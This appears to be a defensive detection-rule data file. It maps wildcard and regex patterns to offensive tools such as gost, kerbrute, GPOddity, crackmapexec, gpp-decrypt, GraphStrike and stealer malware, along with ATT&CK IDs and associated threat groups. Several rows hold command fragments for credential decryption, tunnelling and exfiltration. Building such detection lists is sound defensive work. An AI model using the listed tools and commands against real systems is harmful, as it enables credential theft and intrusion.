"*gost -L=rudp://*",".{0,1000}gost\s\-L\=rudp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46628"
"*gost -L=ssh://:",".{0,1000}gost\s\-L\=ssh\:\/\/\:","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46630"
"*gost -L=ssu://*",".{0,1000}gost\s\-L\=ssu\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46631"
"*gost -L=udp://*",".{0,1000}gost\s\-L\=udp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46632"
"*Got encrypted TGT for * but couldn't convert to hash*",".{0,1000}Got\sencrypted\sTGT\sfor\s.{0,1000}\sbut\scouldn\'t\sconvert\sto\shash.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","46633"
"*Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked*",".{0,1000}Got\sexpected\sRPC_S_SERVER_UNAVAILABLE\sexception\.\sAttack\sworked.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","46634"
"*Got lsass.exe PID: *",".{0,1000}Got\slsass\.exe\sPID\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","46635"
"*gotato -m http*",".{0,1000}gotato\s\-m\shttp.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46636"
"*gotato -m pipe*",".{0,1000}gotato\s\-m\spipe.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46637"
"*gotato* -n mal*",".{0,1000}gotato.{0,1000}\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46638"
"*gotato* -p 4644*",".{0,1000}gotato.{0,1000}\s\-p\s4644.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46639"
"*Gotato-main.*",".{0,1000}Gotato\-main\..{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","46640"
"*govolution/avet*",".{0,1000}govolution\/avet.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","46651"
"*goWMIExec -target ",".{0,1000}goWMIExec\s\-target\s","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","46652"
"*goWMIExec/pkg*",".{0,1000}goWMIExec\/pkg.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","46653"
"*goZulipC2.go*",".{0,1000}goZulipC2\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","46654"
"*goZulipC2-main*",".{0,1000}goZulipC2\-main.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","46655"
"*gp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\').State*",".{0,1000}gp\s\'HKCU\:\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust\sProviders\\\'\)\.State.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#registry","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","46656"
"*gpg2john.*",".{0,1000}gpg2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","46659"
"*gpoddity.py*",".{0,1000}gpoddity\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","46660"
"*gpoddity_smbserver.py*",".{0,1000}gpoddity_smbserver\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","46661"
"*GPOddity-master*",".{0,1000}GPOddity\-master.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","46662"
"*GPO-RemoteAccess.txt*",".{0,1000}GPO\-RemoteAccess\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","46663"
"*gpp_autologin.py*",".{0,1000}gpp_autologin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46664"
"*gpp_password.py*",".{0,1000}gpp_password\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46665"
"*GPP_Passwords.txt*",".{0,1000}GPP_Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","46666"
"*gppassword.py*",".{0,1000}gppassword\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","46667"
"*gpp-decrypt *",".{0,1000}gpp\-decrypt\s.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","46668"
"*gpp-decrypt.py -f groups.xml*",".{0,1000}gpp\-decrypt\.py\s\-f\sgroups\.xml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46669"
"*gpp-decrypt.rb*",".{0,1000}gpp\-decrypt\.rb.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","46670"
"*GPSCoordinates.exe*",".{0,1000}GPSCoordinates\.exe.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","46671"
"*Gr1mmie/AtlasC2*",".{0,1000}Gr1mmie\/AtlasC2.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","46672"
"*Grab Password From IE Window*",".{0,1000}Grab\sPassword\sFrom\sIE\sWindow.{0,1000}","offensive_tool_keyword","RouterPassView","help you to recover your lost password from your router file","T1002 - T1552 - T1027","TA0006 - TA0007","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/router_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46673"
"*Grabbed by Blank Grabber | *",".{0,1000}Grabbed\sby\sBlank\sGrabber\s\|\s.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","46674"
"*Grabbed the username and password from vcenter_creds.txt*",".{0,1000}Grabbed\sthe\susername\sand\spassword\sfrom\svcenter_creds\.txt.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","46675"
"*grabMinecraftCache(*",".{0,1000}grabMinecraftCache\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","46676"
"*grabPasswords(self,mkp,bname,pname,data)*",".{0,1000}grabPasswords\(self,mkp,bname,pname,data\).{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","46677"
"*grahamhelton/IMDSpoof*",".{0,1000}grahamhelton\/IMDSpoof.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","46678"
"*GRANT ALL PRIVILEGES ON jasmin_db.*",".{0,1000}GRANT\sALL\sPRIVILEGES\sON\sjasmin_db\..{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","46679"
"*GrantMailboxAccess.ps1*",".{0,1000}GrantMailboxAccess\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","46681"
"*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","46682"
"*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","46683"
"*GraphLdr.x64.bin*",".{0,1000}GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46684"
"*GraphLdr.x64.exe*",".{0,1000}GraphLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46685"
"*Graphpython.__main__*",".{0,1000}Graphpython\.__main__.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#content","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","46686"
"*Graphpython.utils.helpers*",".{0,1000}Graphpython\.utils\.helpers.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#content","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","46687"
"*GraphRunner*access_tokens.txt*",".{0,1000}GraphRunner.{0,1000}access_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46688"
"*GraphRunner*chatsResponse.json*",".{0,1000}GraphRunner.{0,1000}chatsResponse\.json.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46689"
"*GraphRunner/PHPRedirector*",".{0,1000}GraphRunner\/PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46690"
"*GraphRunner\PHPRedirector*",".{0,1000}GraphRunner\\PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46691"
"*GraphRunnerGUI.html*",".{0,1000}GraphRunnerGUI\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46692"
"*graphspy -i *",".{0,1000}graphspy\s\-i\s.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","46693"
"*GraphSpy.GraphSpy:main*",".{0,1000}GraphSpy\.GraphSpy\:main.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","46694"
"*GraphSpy-master.zip*",".{0,1000}GraphSpy\-master\.zip.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","46695"
"*GraphStrike Server is running and checking SharePoint for Beacon traffic*",".{0,1000}GraphStrike\sServer\sis\srunning\sand\schecking\sSharePoint\sfor\sBeacon\straffic.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46696"
"*GraphStrike.py *",".{0,1000}GraphStrike\.py\s.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","46697"
"*grayhatkiller/SharpExShell*",".{0,1000}grayhatkiller\/SharpExShell.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","46698"
"*GreatSCT*",".{0,1000}GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","46699"
"*GreatSCT.git*",".{0,1000}GreatSCT\.git.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","46700"
"*GreatSCT.py*",".{0,1000}GreatSCT\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","46701"
"*greentm372@gmail.com*",".{0,1000}greentm372\@gmail\.com.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#email","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","46702"
